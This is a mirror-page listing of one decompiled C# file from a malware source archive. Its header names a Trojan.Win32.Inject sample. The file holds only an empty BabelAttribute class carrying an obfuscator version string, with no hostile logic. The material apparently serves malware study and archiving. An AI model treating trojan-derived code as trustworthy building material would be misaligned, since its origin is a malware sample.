mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
13 lines
474 B
C#
13 lines
474 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: BabelAttribute
|
|||
|
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
|
|||
|
|
|||
|
using System;
|
|||
|
|
|||
|
public sealed class BabelAttribute : Attribute
|
|||
|
{
|
|||
|
public const string Version = "3.5.0.0";
|
|||
|
}
|